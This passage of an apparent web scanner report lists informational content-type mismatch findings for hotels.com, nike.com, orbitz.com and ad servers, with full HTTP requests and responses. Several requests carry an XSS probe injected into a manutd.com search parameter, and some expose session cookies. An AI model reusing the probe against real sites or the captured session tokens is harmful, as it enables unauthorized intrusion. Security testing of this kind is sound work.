user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
ntCoent-Length: 150
Expect:
Content-Type: text/html;charset=utf-8
Content-Length: 150
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:28:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEyNC4xLjAuaTE6MTAzLjQuMS5pNjoxNzEuMS4wOjEzMC4xLjEuaTI6NDguMS4wOjk3LjczLjEuaTM6OTguNi40OjE0Mi4wLjAuaTQ6MTk4LjIuMDoxNDUuMC4wLmkyOjIwMC4wLjA6MTM3LjAuMC5pMjoxMDguMS4wLmkyOjE5MC4zLjA6MTUyLjAuMC5pMjoxMzQuMC4xOjE5Ni4xLjA6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjAuMC5pMToxMjEuNTAzLjAuaTc6MTMyLjIuMC5pMjoxMjIuMS4wLmkzOjEzOC4xLjA6MTQ5LjAuMC5pMToxMDQuMC4xOjE5NS4wLjB8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8Mg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:41 GMT; Path=/

<span id="sense_of_urgency_close" class="blue" title="Close popup"></span>
<p>
This hotel has been booked 13 times in the last 24 hours</p>

28.88. http://www.hotels.com/selectors/en_US/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hotels.com
Path:   /selectors/en_US/

Issue detail

The response contains the following Content-type statement: The response states that it contains XML. However, it actually appears to contain HTML.

Request

GET /selectors/en_US/ HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Expect:
Content-Type: text/xml;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:10:10 GMT
Content-Length: 36464
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:10 GMT; Path=/
Set-Cookie: user=RCoxMjQuMS4wLmkxOjk3LjczLjEuaTM6OTguNi40OjEzNy4wLjAuaTI6MTQ1LjAuMC5pMjoxMDguMS4wLmkyOjE1Mi4wLjAuaTI6Mi4yLjE6MTk2LjEuMDo5Mi4wLjAuaTE6MTMyLjIuMC5pMjoxMjEuNTAzLjAuaTc6MTM4LjEuMDoxOTUuMC4wOjEwNC4wLjF8SENPTV9VUyFBKmVuX1VTfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:10 GMT; Path=/

<headerFooterAdditionalData>
<languageSelectorContent>
<group id="site_group_africa_middle_east">
<![CDATA[
<div class="heading">Africa/Middle East</div>
<ul>

...[SNIP]...

28.89. http://www.hublot.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hublot.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.hublot.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4ph3147ql3ijri58if992avst5; DP_WEBSITE_LANGUAGE=en; Languages=http://www.hublot.com/en/; DP_WEBSITE_24H_STAT=1317599916; DP_WEBSITE_MONTH_STAT=10.11; DP_WEBSITE_VISITOR_STAT_NEW=1317599916

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 22 Apr 2008 08:29:56 GMT
Accept-Ranges: bytes
Content-Length: 1078
Content-Type: text/plain; charset=UTF-8
Date: Sun, 02 Oct 2011 23:59:04 GMT
Connection: close

..............(...&... ..........N...(....... ...................................................................................................x..p.p.....p.p......p.......p......pp...............
...[SNIP]...

28.90. http://www.inadcoads.com/script.ashx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.inadcoads.com
Path:   /script.ashx

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /script.ashx?pczid=269ccbc6-3ea2-4863-8eb1-67f59498f8ce&click_url=http://ib.adnxs.com/click?VA8_znuE3j81XrpJDALbPwAAAMDMzPQ_idS0i2nG4T9os-pztRXkP1FauSSUjOIucEeI8W8QIlnW-ohOAAAAAE1ECABlAQAAAgQAAAIAAAB-9gkAPWQAAAAAAABVU0QAVVNEACwB-gD8AdsEKA8DAQUCAQQAAAAA9SRHEAAAAAA./cnd=!NwWFKgi5jQkQ_uwnGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ1CQQwFwPe5tNJvg9SS97K9AS3Qw54xZdAVXUAvRIjJZ8cG4Npzjb2oEHtTSs0LWddJNc4UuK9qJg6H-_P73nH8j5bbHDEE4pEWLROmlWch7wurhaJDssMJ0JvDGdunOlyAxws_JgE413MAAAA%3D%26dst%3D HTTP/1.1
Host: www.inadcoads.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ib.adnxs.com/if?enc=VA8_znuE3j81XrpJDALbPwAAAMDMzPQ_idS0i2nG4T9os-pztRXkP1FauSSUjOIucEeI8W8QIlnW-ohOAAAAAE1ECABlAQAAAgQAAAIAAAB-9gkAPWQAAAAAAABVU0QAVVNEACwB-gD8AdsEKA8BAgUCAQQAAAAA9CQ0EAAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLuQ1CQQwFwPe5tNJvg9SS97K9AS3Qw54xZdAVXUAvRIjJZ8cG4Npzjb2oEHtTSs0LWddJNc4UuK9qJg6H-_P73nH8j5bbHDEE4pEWLROmlWch7wurhaJDssMJ0JvDGdunOlyAxws_JgE413MAAAA%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+27755%2C+1317599958%29%3Buf%28%27c%27%2C+149177%2C+1317599958%29%3Buf%28%27r%27%2C+652926%2C+1317599958%29%3Bppv%2817492%2C+%273378417238380468817%27%2C+1317599958%2C+1317859158%2C+149177%2C+25661%2C+0%29%3Bppv%2817492%2C+%273378417238380468817%27%2C+1317599958%2C+1317859158%2C+149177%2C+25661%2C+0%29%3B&cnd=!Dh5vzwi5jQkQ_uwnGAAgvcgBMAE4_ANAAEiCCFAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAqgBA7ABALkBkJ0uALYV5D_BAZCdLgC2FeQ_yQFmZmZmZmbyP9kBAAAAAAAA8D_gAQA.&ccd=!NwWFKgi5jQkQ_uwnGL3IASAA&referrer=http://www.goal.com&media_subtypes=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET-WS5
P3P: CP="NON DSP COR CURa PSAa PSDa IVAi CONi TELi OUR BUS PHY ONL UNI COM NAV INT DEM"
Date: Mon, 03 Oct 2011 00:00:48 GMT
Content-Length: 1320

iad_rdn = Math.floor(Math.random() * 1E16);iad_maxl = 400;iad_title = '';iad_kw = '';try{iad_title = (document.title ? document.title.substring(0, iad_maxl): '');var iad_eles = document.getElementsByT
...[SNIP]...

28.91. http://www.manutd.com/styles/greybox/gb_scripts.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.manutd.com
Path:   /styles/greybox/gb_scripts.js

Issue detail

The response contains the following Content-type statement: The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /styles/greybox/gb_scripts.js?v=87 HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.1.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 01 Dec 2010 16:06:20 GMT
Accept-Ranges: bytes
ETag: "0662cb17191cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
svr: web5
Content-Length: 24432
Cache-Control: max-age=138117
Date: Sun, 02 Oct 2011 23:49:15 GMT
Connection: close

..v.a.r. .G.B._.C.U.R.R.E.N.T.=.n.u.l.l.;.
.G.B._.h.i.d.e.=.f.u.n.c.t.i.o.n.(.c.b.).{.
.G.B._.C.U.R.R.E.N.T...h.i.d.e.(.c.b.).;.
.}.;.
.G.r.e.y.B.o.x.=.n.e.w. .A.J.S...C.l.a.s.s.(.{.i.n.i.t.:.f.u.n.c.
...[SNIP]...

28.92. http://www.nike.com/nikefootball/global/xml/style.xml

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nike.com
Path:   /nikefootball/global/xml/style.xml

Issue detail

The response contains the following Content-type statement: The response states that it contains XML. However, it actually appears to contain HTML.

Request

GET /nikefootball/global/xml/style.xml HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikeos/global/modules/nav/v1/swf/nav-module-menu-1-2.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKNIKE=0; s_sv_sid=524830605105; NIKE_COMMERCE_COUNTRY=US; NIKE_COMMERCE_LANG_LOCALE=en_US; NIKE_COUNTRY=USA; NIKE_LANG_LOCALE=en_US; s_cc=true; dfa_cookie=nikefootballglobal%2Cnikeall%2Cnikesoccer%2Cnikefootballnam; s_ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1317599910141; s_sv_112_p1=1@37@d/7125/7124/7123/7122/7121&s/7126&e/3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/xml
RequestStartSec: 1244081979
RequestStartUsec: 115421
P3P: policyref=http://www.nike.com/w3c/p3p.xml
AnalysisUserId: 104261244081972
Last-Modified: Tue, 11 Nov 2008 13:20:17 GMT
ETag: "8f-49198691"
Vary: Accept-Encoding
Content-Length: 143
Cache-Control: max-age=4344
Expires: Mon, 03 Oct 2011 01:15:13 GMT
Date: Mon, 03 Oct 2011 00:02:49 GMT
Connection: close

<div id="nikeos_style" theme="dark">
   <div id="accent_color" flat="0xFF6600" gradient_top="0xF26100" gradient_bottom="0xBC4B00"></div>
</div>

28.93. http://www.nike.com/nikefootball/home/socialfeeds

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nike.com
Path:   /nikefootball/home/socialfeeds

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /nikefootball/home/socialfeeds?locale=en_US HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikefootball/home/?locale=en_US&ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKNIKE=0; s_sv_sid=524830605105; s_sv_112_p1=1@37@d/7125/7124/7123/7122/7121&s/7126&e/2; s_sv_112_s1=1@16@a//1317599910141; NIKE_COMMERCE_COUNTRY=US; NIKE_COMMERCE_LANG_LOCALE=en_US; NIKE_COUNTRY=USA; NIKE_LANG_LOCALE=en_US; s_cc=true; dfa_cookie=nikefootballglobal%2Cnikeall%2Cnikesoccer%2Cnikefootballnam; s_ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Length: 2479
Cache-Control: max-age=2641
Expires: Mon, 03 Oct 2011 00:46:46 GMT
Date: Mon, 03 Oct 2011 00:02:45 GMT
Connection: close

           
                                                                                                                               <li class="hero" data-url="http://inside.nike.com/blogs/nikesoccer/feeds/posts">
                       <a href="http://inside.nike.com/blogs/nikesoccer/2011/09/19/m
...[SNIP]...

28.94. http://www.nike.com/nikefootball/home/twitterfeed

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nike.com
Path:   /nikefootball/home/twitterfeed

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /nikefootball/home/twitterfeed?locale=en_US HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikefootball/home/?locale=en_US&ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKNIKE=0; s_sv_sid=524830605105; s_sv_112_p1=1@37@d/7125/7124/7123/7122/7121&s/7126&e/2; s_sv_112_s1=1@16@a//1317599910141; NIKE_COMMERCE_COUNTRY=US; NIKE_COMMERCE_LANG_LOCALE=en_US; NIKE_COUNTRY=USA; NIKE_LANG_LOCALE=en_US; s_cc=true; dfa_cookie=nikefootballglobal%2Cnikeall%2Cnikesoccer%2Cnikefootballnam; s_ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Length: 846
Cache-Control: max-age=58
Expires: Mon, 03 Oct 2011 00:03:44 GMT
Date: Mon, 03 Oct 2011 00:02:46 GMT
Connection: close

           
                                                                                                                                                                                                                                                   <li data-url="http://twitter.com/statuses/user_timeline/10678292.rss">
                           
                           <a href="http://tw
...[SNIP]...

28.95. http://www.nike.com/nikeos/global/modules/nav/xml/country/country_lockup_config_US.xml

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nike.com
Path:   /nikeos/global/modules/nav/xml/country/country_lockup_config_US.xml

Issue detail

The response contains the following Content-type statement: The response states that it contains XML. However, it actually appears to contain HTML.

Request

GET /nikeos/global/modules/nav/xml/country/country_lockup_config_US.xml HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikeos/global/modules/nav/v1/swf/nav-module-top-1-2.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKNIKE=0; s_sv_sid=524830605105; NIKE_COMMERCE_COUNTRY=US; NIKE_COMMERCE_LANG_LOCALE=en_US; NIKE_COUNTRY=USA; NIKE_LANG_LOCALE=en_US; s_cc=true; dfa_cookie=nikefootballglobal%2Cnikeall%2Cnikesoccer%2Cnikefootballnam; s_ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1317599910141; s_sv_112_p1=1@37@d/7125/7124/7123/7122/7121&s/7126&e/3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 08 Sep 2011 17:34:10 GMT
ETag: "1b37-4ac7177eac880"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 6967
Content-Type: application/xml
Cache-Control: max-age=3012
Expires: Mon, 03 Oct 2011 00:53:01 GMT
Date: Mon, 03 Oct 2011 00:02:49 GMT
Connection: close

<div id="panel">

   <div class="column">
   
       <div class="categoryButton" label="nikedotcom">
           <span id="text1">Nike</span>
           <span id="text2">.com</span>
           <a class="action" type="url" href=
...[SNIP]...

28.96. http://www.nike.com/nikeos/global/modules/nav/xml/language/lockup_expand_translate.xml

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nike.com
Path:   /nikeos/global/modules/nav/xml/language/lockup_expand_translate.xml

Issue detail

The response contains the following Content-type statement: The response states that it contains XML. However, it actually appears to contain HTML.

Request

GET /nikeos/global/modules/nav/xml/language/lockup_expand_translate.xml HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikeos/global/modules/nav/v1/swf/nav-module-top-1-2.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKNIKE=0; s_sv_sid=524830605105; NIKE_COMMERCE_COUNTRY=US; NIKE_COMMERCE_LANG_LOCALE=en_US; NIKE_COUNTRY=USA; NIKE_LANG_LOCALE=en_US; s_cc=true; dfa_cookie=nikefootballglobal%2Cnikeall%2Cnikesoccer%2Cnikefootballnam; s_ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1317599910141; s_sv_112_p1=1@37@d/7125/7124/7123/7122/7121&s/7126&e/3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 25 May 2011 12:49:22 GMT
ETag: "134-4a4192236d880"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 308
Content-Type: application/xml
Cache-Control: max-age=6375
Expires: Mon, 03 Oct 2011 01:49:04 GMT
Date: Mon, 03 Oct 2011 00:02:49 GMT
Connection: close

...<div id="expand">
   <span id="en">More</span>
   <span id="fr">PLUS</span>
   <span id="de">MEHR</span>
   <span id="it">PI..</span>
   <span id="ja">MORE</span>
   <span id="ko">...</span>
   <span id="
...[SNIP]...

28.97. http://www.orbitz.com/cacheable/empty.html

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.orbitz.com
Path:   /cacheable/empty.html

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /cacheable/empty.html HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; adRotator=true; JSESSIONID=DFE4F06BE571072B; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|egapp2189p.prod.orbitz.net; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDA1NTEzNDh8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOTowOToxMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b25545525d5f4f58455e445a4a4217b9; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; mbox=session#1317600406536-142286#1317602423|check#true#1317600623|PC#1317600406536-142286.19#1320192592

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 26 Sep 2011 15:42:38 GMT
ETag: "8-4adda022fb780"
Cache-Control: max-age=14400
Expires: Mon, 03 Oct 2011 03:46:12 GMT
Content-Type: text/html
Cteonnt-Length: 8
Server: Apache
Date: Mon, 03 Oct 2011 00:10:13 GMT
Age: 1441
Connection: keep-alive
Content-Length: 8

<!-- -->

28.98. http://www.revresda.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 10 Aug 2010 04:51:43 GMT
ETag: "57e-e3b535c0"
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Content-Type: text/plain; charset=UTF-8
Cteonnt-Length: 1406
Server: Apache
Date: Mon, 03 Oct 2011 00:40:29 GMT
Age: 7073
Connection: keep-alive
Cache-Control: private
Content-Length: 1406

..............h.......(....... ................................2...V*...k..2...\....d..(...1............i..+................]..-.......a............}...l..f...n...'.......B........c......:...4....^..e
...[SNIP]...

28.99. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=225&rotator=true&width=519&adType=script&

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=225&rotator=true&width=519&adType=script&

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=225&rotator=true&width=519&adType=script& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:48 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aebaa22-24733-1570161280-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv004p.prod.orbitz.net:9678:1
